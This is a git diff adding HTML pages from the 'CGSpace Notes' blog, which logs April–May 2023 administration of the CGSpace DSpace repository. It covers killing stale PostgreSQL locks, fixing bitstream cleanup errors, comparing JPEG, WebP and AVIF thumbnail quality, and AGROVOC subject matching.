+	at org.springframework.aop.framework.JdkDynamicAopProxy.invoke(JdkDynamicAopProxy.java:204)
+	at com.sun.proxy.$Proxy186.service(Unknown Source)
+	at org.dspace.springmvc.CocoonView.render(CocoonView.java:113)
+	at org.springframework.web.servlet.DispatcherServlet.render(DispatcherServlet.java:1216)
+	at org.springframework.web.servlet.DispatcherServlet.processDispatchResult(DispatcherServlet.java:1001)
+	at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:945)
+	at org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:867)
+	at org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:951)
+	at org.springframework.web.servlet.FrameworkServlet.doPost(FrameworkServlet.java:853)
+	at javax.servlet.http.HttpServlet.service(HttpServlet.java:647)
+	at org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:827)
+	at javax.servlet.http.HttpServlet.service(HttpServlet.java:728)
+	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:303)
+	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+	at org.dspace.app.xmlui.cocoon.SetCharacterEncodingFilter.doFilter(SetCharacterEncodingFilter.java:113)
+	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+	at org.dspace.app.xmlui.cocoon.DSpaceCocoonServletFilter.doFilter(DSpaceCocoonServletFilter.java:160)
+	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+	at org.dspace.app.xmlui.cocoon.servlet.multipart.DSpaceMultipartFilter.doFilter(DSpaceMultipartFilter.java:119)
+	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+	at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
+	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+	at org.dspace.utils.servlet.DSpaceWebappServletFilter.doFilter(DSpaceWebappServletFilter.java:78)
+	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
+	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
+	at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:219)
+	at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:110)
+	at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:492)
+	at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:165)
+	at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:104)
+	at org.apache.catalina.valves.CrawlerSessionManagerValve.invoke(CrawlerSessionManagerValve.java:235)
+	at org.apache.catalina.valves.AccessLogValve.invoke(AccessLogValve.java:1025)
+	at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:116)
+	at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:451)
+	at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1201)
+	at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:654)
+	at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:317)
+	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
+	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
+	at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
+	at java.lang.Thread.run(Thread.java:750)
+</code></pre><ul>
+<li>I don&rsquo;t see anything on the DSpace issue tracker or mailing list so I asked about it on the DSpace Slack&hellip;</li>
+<li>Peter said CGSpace was slow and I see a lot of locks from the XMLUI
+<ul>
+<li>I looked and found many locks that were many hours and days old so I killed some:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql &lt; locks-age.sql | grep -E <span style="color:#e6db74">&#34;[[:digit:]] days&#34;</span> | awk -F<span style="color:#ae81ff">\|</span> <span style="color:#e6db74">&#39;{print $10}&#39;</span> | sort -u
+</span></span><span style="display:flex;"><span> 1050672
+</span></span><span style="display:flex;"><span> 1053773
+</span></span><span style="display:flex;"><span> 1054602
+</span></span><span style="display:flex;"><span> 1054702
+</span></span><span style="display:flex;"><span> 1056782
+</span></span><span style="display:flex;"><span> 1057629
+</span></span><span style="display:flex;"><span> 1057630
+</span></span><span style="display:flex;"><span>$ psql &lt; locks-age.sql | grep -E <span style="color:#e6db74">&#34;[[:digit:]] days&#34;</span> | awk -F<span style="color:#ae81ff">\|</span> <span style="color:#e6db74">&#39;{print $10}&#39;</span> | sort -u | xargs kill
+</span></span></code></pre></div><ul>
+<li>I&rsquo;m also running a <code>dspace cleanup -v</code>, but it doesn&rsquo;t seem to be finishing
+<ul>
+<li>I recall something like there being errors in the logs rather than on the command line in DSpace 6&hellip;</li>
+<li>I found it in the DSpace log:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>2023-04-17 21:09:46,004 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
+</span></span><span style="display:flex;"><span>  Detail: Key (uuid)=(a7ddf477-1c04-4de0-9c7a-4d3c84a875bc) is still referenced from table &#34;bundle&#34;.
+</span></span></code></pre></div><ul>
+<li>If I mark the primary bitstream as null manually the cleanup script continues until it finds a few more
+<ul>
+<li>I ended up with a long list of UUIDs to fix before the script would complete:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -d dspace -c <span style="color:#e6db74">&#34;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (&#39;a7ddf477-1c04-4de0-9c7a-4d3c84a875bc&#39;, &#39;9582b661-9c2d-4c86-be22-c3b0942b646a&#39;, &#39;210a4d5d-3af9-46f0-84cc-682dd1431762&#39;, &#39;51115f07-0a60-4988-8536-b9ebd2a5e15e&#39;, &#39;0fc5021d-3264-413a-b2e2-74bda38a394e&#39;, &#39;4704fa62-b8ab-4dfe-b7aa-0e4905f8412a&#39;)&#34;</span>
+</span></span></code></pre></div><ul>
+<li>This process ended up taking a few days because each iteration ran for over four hours before failing on the next UUID, sighhhhh</li>
+</ul>
+<h2 id="2023-04-18">2023-04-18</h2>
+<ul>
+<li>Regarding the item Abenet noticed yesterday that has a blank page and a nullPointerException
+<ul>
+<li>It appears OK on DSpace Test! <a href="https://dspacetest.cgiar.org/handle/10568/75611">https://dspacetest.cgiar.org/handle/10568/75611</a></li>
+<li>And according to the REST API on CGSpace the item was modified on 2023-04-11, so last week&hellip;</li>
+<li>According to the DSpace logs it was Francesca who edited the item last week, so I asked her for more information before I troubleshoot more</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-04-19">2023-04-19</h2>
+<ul>
+<li>I fixed the Bioversity item by deleting the <code>9781138781276.jpg</code> bitstream via the REST API
+<ul>
+<li>I <em>think</em> Francesca might have changed the &ldquo;format&rdquo; of it?</li>
+<li>Anyway, this item has a PDF so we have a proper thumbnail and don&rsquo;t need that other journal cover one</li>
+</ul>
+</li>
+<li>I noticed a URL for this <a href="https://hdl.handle.net/10568/89049">Bioversity item</a> redirects incorrectly
+<ul>
+<li>I had mentioned this to Maria and Francesca a few months ago but it seems to never have been resolved</li>
+</ul>
+</li>
+<li>The <code>dspace cleanup -v</code> finally finished after a few days of running and stopping&hellip;</li>
+<li>I decided to update the thumbnails in the Bioversity books collection because I saw a few old ones suffering from the CropBox issue</li>
+<li>Also, all day there&rsquo;s been a high load on CGSpace, with lots of locks in PostgreSQL
+<ul>
+<li>I had been waiting until the bitstream cleanup finished&hellip; now I might need to restart PostgreSQL to kill some old locks as something needs to give</li>
+<li>I restarted PostgreSQL, but DSpace was still hanging on simple XMLUI options so I ended up restarting Tomcat</li>
+</ul>
+</li>
+<li>Tag 544 ORCID identifiers with my script</li>
+<li>I updated my <code>generation-loss.sh</code> and <code>improved-dspace-thumbnails</code> scripts to include thirty-five PDFs from CGSpace (up from twenty-four) to get a larger sample
+<ul>
+<li>Now starting to get some numbers comparing JPEG, WebP, and AVIF</li>
+<li>First, out of curiousity, I checked the average ssimulacra2 scores at Q75, Q80, and Q92 for each format:</li>
+</ul>
+</li>
+</ul>
+<table>
+<thead>
+<tr>
+<th></th>
+<th>Q75</th>
+<th>Q80</th>
+<th>Q92</th>
+</tr>
+</thead>
+<tbody>
+<tr>
+<td>JPEG</td>
+<td>71</td>
+<td>74</td>
+<td>88</td>
+</tr>
+<tr>
+<td>WebP</td>
+<td>74</td>
+<td>77</td>
+<td>82</td>
+</tr>
+<tr>
+<td>AVIF</td>
+<td>82</td>
+<td>83</td>
+<td>86</td>
+</tr>
+</tbody>
+</table>
+<ul>
+<li>Then I checked the quality and file size (bytes) needed to hit an average ssimulacra2 score of 80 with each format:
+<ul>
+<li><strong>JPEG</strong>: Q89, 124923 bytes</li>
+<li><strong>WebP</strong>: Q86, 84662 bytes (33% smaller than JPEG size)</li>
+<li><strong>AVIF</strong>: Q65, 67597 bytes (56% smaller than JPEG size)</li>
+</ul>
+</li>
+<li><a href="https://developers.google.com/speed/webp/docs/webp_study">Google&rsquo;s original WebP study</a> uses this technique to compare WebP to JPEG too
+<ul>
+<li>As the quality settings are not comparable between formats, we need to compare the formats at matching perceptual scores (ssimulacra2 in this case)</li>
+<li>I used a ssimulacra2 score of 80 because that&rsquo;s the about the highest score I see with WebP using my samples, though JPEG and AVIF do go higher</li>
+<li>Also, according to current ssimulacra2 (v2.1), a score of 70 is &ldquo;high quality&rdquo; and a score of 90 is &ldquo;very high quality&rdquo;, so 80 should be reasonably high enough&hellip;</li>
+</ul>
+</li>
+<li>Here is a plot of the qualities and ssimulacra2 scores:</li>
+</ul>
+<p><img src="/cgspace-notes/2023/04/quality-vs-score-ssimulacra-v2.1.png" alt="Quality vs Score"></p>
+<ul>
+<li>Export CGSpace to check for missing Initiatives mappings</li>
+</ul>
+<h2 id="2023-04-22">2023-04-22</h2>
+<ul>
+<li>Export the Initiatives collection to run it through csv-metadata-quality
+<ul>
+<li>I wanted to make sure all the Initiatives items had correct regions</li>
+<li>I had to manually fix a few license identifiers and ISSNs</li>
+<li>Also, I found a few items submitted by MEL that had dates in DD/MM/YYYY format, so I sent them to Salem for him to investigate</li>
+</ul>
+</li>
+<li>Start a harvest on AReS</li>
+</ul>
+<h2 id="2023-04-26">2023-04-26</h2>
+<ul>
+<li>Begin working on the list of non-AGROVOC CGSpace subjects for FAO
+<ul>
+<li>The last time I did this was in 2022-06</li>
+<li>I used the following SQL query to dump values from all subject fields, lower case them, and group by counts:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspacetest= ☘ \COPY (SELECT DISTINCT(lower(text_value)) AS &#34;subject&#34;, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (187, 120, 210, 122, 215, 127, 208, 124, 128, 123, 125, 135, 203, 236, 238, 119) GROUP BY &#34;subject&#34; ORDER BY count DESC) to /tmp/2023-04-26-cgspace-subjects.csv WITH CSV HEADER;
+</span></span><span style="display:flex;"><span>COPY 26315
+</span></span><span style="display:flex;"><span>Time: 2761.981 ms (00:02.762)
+</span></span></code></pre></div><ul>
+<li>Then I extracted the subjects and looked them up against AGROVOC:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c subject /tmp/2023-04-26-cgspace-subjects.csv | sed <span style="color:#e6db74">&#39;1d&#39;</span> &gt; /tmp/2023-04-26-cgspace-subjects.txt
+</span></span><span style="display:flex;"><span>$ ./ilri/agrovoc_lookup.py -i /tmp/2023-04-26-cgspace-subjects.txt -o /tmp/2023-04-26-cgspace-subjects-results.csv
+</span></span></code></pre></div><h2 id="2023-04-27">2023-04-27</h2>
+<ul>
+<li>The AGROVOC lookup from yesterday finished, so I extracted all terms that did not match and joined them with the original CSV so I can see the counts:
+<ul>
+<li>(I also note that the <code>agrovoc_lookup.py</code> script didn&rsquo;t seem to be caching properly, as it had to look up everything again the next time I ran it despite the requests cache being 174MB!)</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>csvgrep -c &#39;number of matches&#39; -r &#39;^0$&#39; /tmp/2023-04-26-cgspace-subjects-results.csv \
+</span></span><span style="display:flex;"><span>  | csvcut -c subject \
+</span></span><span style="display:flex;"><span>  | csvjoin -c subject /tmp/2023-04-26-cgspace-subjects.csv - \
+</span></span><span style="display:flex;"><span>  &gt; /tmp/2023-04-26-cgspace-non-agrovoc.csv
+</span></span></code></pre></div><ul>
+<li>I filtered for only those terms that had counts larger than fifty
+<ul>
+<li>I also removed terms like &ldquo;forages&rdquo;, &ldquo;policy&rdquo;, &ldquo;pests and diseases&rdquo; because those exist as singular or separate terms in AGROVOC</li>
+<li>I also removed ambiguous terms like &ldquo;cocoa&rdquo;, &ldquo;diversity&rdquo;, &ldquo;resistance&rdquo; etc because there are various other preferred terms for those in AGROVOC</li>
+<li>I also removed spelling mistakes like &ldquo;modeling&rdquo; and &ldquo;savanas&rdquo; because those exist in their correct form in AGROVOC</li>
+<li>I also removed internal CGIAR terms like &ldquo;tac&rdquo;, &ldquo;crp&rdquo;, &ldquo;internal review&rdquo; etc (note: these are mostly from CGIAR System Office&rsquo;s subjects&hellip; perhaps I exclude those next time?)</li>
+</ul>
+</li>
+<li>I note that many of <em>our</em> terms would match if they were singular, plural, or split up into separate terms, so perhaps we should pair this with an excercise to review our own terms</li>
+<li>I couldn&rsquo;t finish the work locally yet so I uploaded my list to Google Docs to continue later</li>
+</ul>
+<h2 id="2023-04-28">2023-04-28</h2>
+<ul>
+<li>The ImageMagick CMYK issue is bothering me still
+<ul>
+<li>I am on a plane currently, but I have a Docker image of ImageMagick 7.1.1-3 and I compared the output of all CMYK PDFs using the same command on my local machine</li>
+<li>The images from the Docker environment are correct with <em>only</em> <code>-colorspace sRGB</code> (no profiles!) as the commenters on GitHub said</li>
+<li>This leads me to believe something wrong in my own environment, perhaps Ghostscript&hellip;?</li>
+<li>The container has Ghostscript 9.53.3~dfsg-7+deb11u2 from Debian 11, while my Arch Linux system has Ghostscript 10.01.1-1</li>
+</ul>
+</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2023-05/index.html b/docs/2023-05/index.html
new file mode 100644
index 000000000..3d5f4a3d9
--- /dev/null
+++ b/docs/2023-05/index.html
@@ -0,0 +1,428 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="May, 2023" />
+<meta property="og:description" content="2023-05-03
+
+Alliance&rsquo;s TIP team emailed me to ask about issues authenticating on CGSpace
+
+It seems their password expired, which is annoying
+
+
+I continued looking at the CGSpace subjects for the FAO / AGROVOC exercise that I started last week
+
+There are many of our subjects that would match if they added a &ldquo;-&rdquo; like &ldquo;high yielding varieties&rdquo; or used singular&hellip;
+Also I found at least two spelling mistakes, for example &ldquo;decison support systems&rdquo;, which would match if it was spelled correctly
+
+
+Work on cleaning, proofing, and uploading twenty-seven records for IFPRI to CGSpace
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2023-05/" />
+<meta property="article:published_time" content="2023-05-03T08:53:36+03:00" />
+<meta property="article:modified_time" content="2023-05-30T20:19:17+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="May, 2023"/>
+<meta name="twitter:description" content="2023-05-03
+
+Alliance&rsquo;s TIP team emailed me to ask about issues authenticating on CGSpace
+
+It seems their password expired, which is annoying
+
+
+I continued looking at the CGSpace subjects for the FAO / AGROVOC exercise that I started last week
+
+There are many of our subjects that would match if they added a &ldquo;-&rdquo; like &ldquo;high yielding varieties&rdquo; or used singular&hellip;
+Also I found at least two spelling mistakes, for example &ldquo;decison support systems&rdquo;, which would match if it was spelled correctly
+
+
+Work on cleaning, proofing, and uploading twenty-seven records for IFPRI to CGSpace
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "May, 2023",
+  "url": "https://alanorth.github.io/cgspace-notes/2023-05/",
+  "wordCount": "1282",
+  "datePublished": "2023-05-03T08:53:36+03:00",
+  "dateModified": "2023-05-30T20:19:17+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2023-05/">
+
+    <title>May, 2023 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2023-05/">May, 2023</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2023-05-03T08:53:36+03:00">Wed May 03, 2023</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2023-05-03">2023-05-03</h2>
+<ul>
+<li>Alliance&rsquo;s TIP team emailed me to ask about issues authenticating on CGSpace
+<ul>
+<li>It seems their password expired, which is annoying</li>
+</ul>
+</li>
+<li>I continued looking at the CGSpace subjects for the FAO / AGROVOC exercise that I started last week
+<ul>
+<li>There are many of our subjects that would match if they added a &ldquo;-&rdquo; like &ldquo;high yielding varieties&rdquo; or used singular&hellip;</li>
+<li>Also I found at least two spelling mistakes, for example &ldquo;decison support systems&rdquo;, which would match if it was spelled correctly</li>
+</ul>
+</li>
+<li>Work on cleaning, proofing, and uploading twenty-seven records for IFPRI to CGSpace</li>
+</ul>
+<ul>
+<li>I notice there are a few dozen locks from the <code>dspaceWeb</code> pool that are five days old on CGSpace so I killed them</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql &lt; locks-age.sql | grep <span style="color:#e6db74">&#34; days &#34;</span> | awk -F<span style="color:#e6db74">&#34;|&#34;</span> <span style="color:#e6db74">&#39;{print $10}&#39;</span> | sort -u | xargs kill
+</span></span></code></pre></div><h2 id="2023-05-04">2023-05-04</h2>
+<ul>
+<li>Sync DSpace Test with CGSpace</li>
+<li>I replaced one item&rsquo;s thumbnail with a WebP version and XMLUI displays it fine</li>
+<li>I spent some time checking the CMYK issue with Arch&rsquo;s ImageMagick 7 and the Docker container and I think ImageMagick 7 just handles CMYK wrong&hellip;
+<ul>
+<li>libvips does it correctly automatically and looks closer to the PDF</li>
+</ul>
+</li>
+<li>Meeting about CG Core types</li>
+</ul>
+<h2 id="2023-05-10">2023-05-10</h2>
+<ul>
+<li>Write a script to find the <code>metadata_field_id</code> values associated with the non-AGROVOC subjects I am working on for Sara
+<ul>
+<li>This is useful because we want to know who to contact for a definition</li>
+<li>The script was:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#66d9ef">while</span> read -r subject; <span style="color:#66d9ef">do</span>
+</span></span><span style="display:flex;"><span>    metadata_field_id<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>psql -h localhost -U postgres -d dspacetest -qtAX <span style="color:#e6db74">&lt;&lt;SQL
+</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        SELECT DISTINCT(metadata_field_id) FROM metadatavalue WHERE LOWER(text_value)=&#39;$subject&#39;
+</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">SQL</span>
+</span></span><span style="display:flex;"><span><span style="color:#66d9ef">)</span>
+</span></span><span style="display:flex;"><span>    metadata_field_id<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>echo $metadata_field_id | sed <span style="color:#e6db74">&#39;s/[[:space:]]/||/g&#39;</span><span style="color:#66d9ef">)</span>
+</span></span><span style="display:flex;"><span>
+</span></span><span style="display:flex;"><span>    echo <span style="color:#e6db74">&#34;</span>$subject<span style="color:#e6db74">,</span>$metadata_field_id<span style="color:#e6db74">&#34;</span>
+</span></span><span style="display:flex;"><span><span style="color:#66d9ef">done</span> &lt; &lt;<span style="color:#f92672">(</span>csvcut -c <span style="color:#ae81ff">1</span> ~/Downloads/2023-04-26<span style="color:#ae81ff">\ </span>CGIAR<span style="color:#ae81ff">\ </span>non-AGROVOC<span style="color:#ae81ff">\ </span>subjects.csv | sed 1d<span style="color:#f92672">)</span>
+</span></span></code></pre></div><ul>
+<li>I also realized that Bernard Bett didn&rsquo;t have any items on CGSpace tagged with his ORCID identifier, so I tagged 230!</li>
+</ul>
+<h2 id="2023-05-11">2023-05-11</h2>
+<ul>
+<li>CG Core meeting</li>
+<li>Finalize looking at the CGSpace non-AGROVOC subjects for FAO</li>
+</ul>
+<h2 id="2023-05-12">2023-05-12</h2>
+<ul>
+<li>Export the Alliance community to do some country/region fixes
+<ul>
+<li>I also sent Maria and Francesca the export because they want to add more regions and subregions</li>
+</ul>
+</li>
+<li>Export the entire CGSpace to check for missing Initiative collection mappings
+<ul>
+<li>I also adding missing regions</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-05-16">2023-05-16</h2>
+<ul>
+<li>I finally cleaned up and published my latest evaluation of <a href="https://alanorth.github.io/improved-dspace-thumbnails/evaluating-jpeg-webp-avif.html">JPEG, WebP, and AVIF</a>
+<ul>
+<li>I <a href="https://github.com/DSpace/DSpace/issues/8849">filed an issue on DSpace</a> to track this</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-05-17">2023-05-17</h2>
+<ul>
+<li>Re-sync CGSpace to DSpace 7 Test</li>
+<li>I came up with a naive patch to use WebP instead of JPEG in the DSpace ImageMagick filter, and it works, but doesn&rsquo;t replace existing JPEGs&hellip; hmmm
+<ul>
+<li>Also, it does PDF to WebP to WebP haha</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-05-18">2023-05-18</h2>
+<ul>
+<li>I created a <a href="https://github.com/DSpace/DSpace/pull/8850">pull request</a> to improve some minor documentation, typo, and logic issues in the DSpace ImageMagick thumbnail filters</li>
+<li>I realized that there is a quick win to the generation loss issue with ImageMagickThumbnailFilter
+<ul>
+<li>We can use ImageMagick&rsquo;s internal MIFF instead of JPEG when writing the intermediate image</li>
+<li>According to the <a href="https://github.com/libvips/libvips/issues/571">libvips author PNG is very slow</a>!</li>
+<li>I re-ran my <code>generation-loss.sh</code> script using MIFF and found that it had essentially the same results as PNG, which is about 1.1 points higher on the ssimulacra2 (v2.1) scoring scale</li>
+<li>Also, according to my tests with the cosmo rusage.com utility, I see that MIFF is indeed much faster than PNG</li>
+<li>I updated my pull request to add this quick win</li>
+</ul>
+</li>
+<li>Weekly CG Core types meeting
+<ul>
+<li>Low attendance so I just kept working on the spreadsheet</li>
+<li>We are at the stage of voting on definitions</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-05-19">2023-05-19</h2>
+<ul>
+<li>I ported a few of the minor ImageMagick Thumbnail Filter improvements to our <code>6_x-prod</code> branch</li>
+</ul>
+<h2 id="2023-05-20">2023-05-20</h2>
+<ul>
+<li>I deployed the latest thumbnail changes on CGSpace, ran all updates, and rebooted it</li>
+<li>I exported CGSpace to check for missing Initiative mappings</li>
+<li>Then I started a harvest on AReS</li>
+</ul>
+<h2 id="2023-05-23">2023-05-23</h2>
+<ul>
+<li>Help Francesca with an import of a journal article with a few hundred authors
+<ul>
+<li>I used the DSpace 7 live import from PubMed</li>
+</ul>
+</li>
+<li>I also noticed a bug in the CrossRef live import if you change the DOI field, so I <a href="https://github.com/DSpace/DSpace/issues/8865">filed an issue</a></li>
+</ul>
+<h2 id="2023-05-25">2023-05-25</h2>
+<ul>
+<li>Meeting on output types</li>
+<li>Make a <a href="https://github.com/DSpace/DSpace/pull/8866">pull request on DSpace to capture publisher during live import from Crossref</a></li>
+</ul>
+<h2 id="2023-05-26">2023-05-26</h2>
+<ul>
+<li>Make a <a href="https://github.com/DSpace/DSpace/pull/8868">pull request on DSpace to update checkstyle</a></li>
+<li>Make a <a href="https://github.com/DSpace/dspace-angular/pull/2274">pull request on DSpace-angular to fix an incorrect i18n UI string</a></li>
+<li>I&rsquo;m experimenting with replacing old thumbnails
+<ul>
+<li>In the past we used to upload thumbnails for journal covers, but those were low quality and look horrible now</li>
+<li>Using the provenance field I want to identify items with 1 bitstream of type gif or jpg, then extract the item IDs along with DOIs:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sql" data-lang="sql"><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">\</span><span style="color:#66d9ef">COPY</span> (<span style="color:#66d9ef">SELECT</span>
+</span></span><span style="display:flex;"><span>    text_value,
+</span></span><span style="display:flex;"><span>    dspace_object_id
+</span></span><span style="display:flex;"><span><span style="color:#66d9ef">FROM</span>
+</span></span><span style="display:flex;"><span>    metadatavalue
+</span></span><span style="display:flex;"><span><span style="color:#66d9ef">WHERE</span>
